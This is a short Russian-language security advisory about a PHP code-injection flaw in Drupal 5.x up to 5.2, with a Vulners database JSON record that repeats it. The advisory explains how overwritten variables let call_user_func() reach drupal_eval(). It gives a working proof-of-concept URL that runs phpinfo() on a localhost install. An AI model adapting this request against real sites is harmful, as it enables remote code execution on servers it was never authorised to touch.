Description
оф сайт http://drupal.org/
уязвимы версии drupal 5 <=5.2 и возможно другие.
благодоря возможности подменить некоторые переменные можно вызвать
произвольную функцию определенную в скриптах посредством call_user_func(),
в результате чего можно выполнить произвольный код PHP через встроеную функцию
движка - drupal_eval().
PoC тестировался на PHP версии 5.0.4
http://localhost/drupal/?_menu[callbacks][1]
[callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The Best forum on Web Security Application http://forum.antichat.ru/
{"id": "SECURITYVULNS:DOC:18137", "bulletinFamily": "software", "title": "drupal Zend Hash Del Key Or Index php injection", "description": "\u043e\u0444 \u0441\u0430\u0439\u0442 http://drupal.org/\r\n\u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0432\u0435\u0440\u0441\u0438\u0438 drupal 5 <=5.2 \u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u0434\u0440\u0443\u0433\u0438\u0435.\r\n\r\n\u0431\u043b\u0430\u0433\u043e\u0434\u043e\u0440\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043f\u043e\u0434\u043c\u0435\u043d\u0438\u0442\u044c \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u0437\u0432\u0430\u0442\u044c \r\n\u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u044e \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u0443\u044e \u0432 \u0441\u043a\u0440\u0438\u043f\u0442\u0430\u0445 \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c call_user_func(),\r\n\u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0447\u0435\u0433\u043e \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 PHP \u0447\u0435\u0440\u0435\u0437 \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u044e \r\n\u0434\u0432\u0438\u0436\u043a\u0430 - drupal_eval().\r\n\r\nPoC \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0441\u044f \u043d\u0430 PHP \u0432\u0435\u0440\u0441\u0438\u0438 5.0.4\r\n\r\nhttp://localhost/drupal/?_menu[callbacks][1]\r\n[callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();\r\n\r\n--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\r\nThe Best forum on Web Security Application http://forum.antichat.ru/", "published": "2007-10-08T00:00:00", "modified": "2007-10-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18137", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:23", "edition": 1, "viewCount": 2102, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8223"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8223"]}]}, "exploitation": null, "affected_software": {"major_version": []}, "vulnersScore": -0.2}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645587817, "score": 1659803227, "affected_software_major_version": 1666695388}, "_internal": {"score_hash": "07388727a4305717a94c10ddd50b9f0c"}}
{}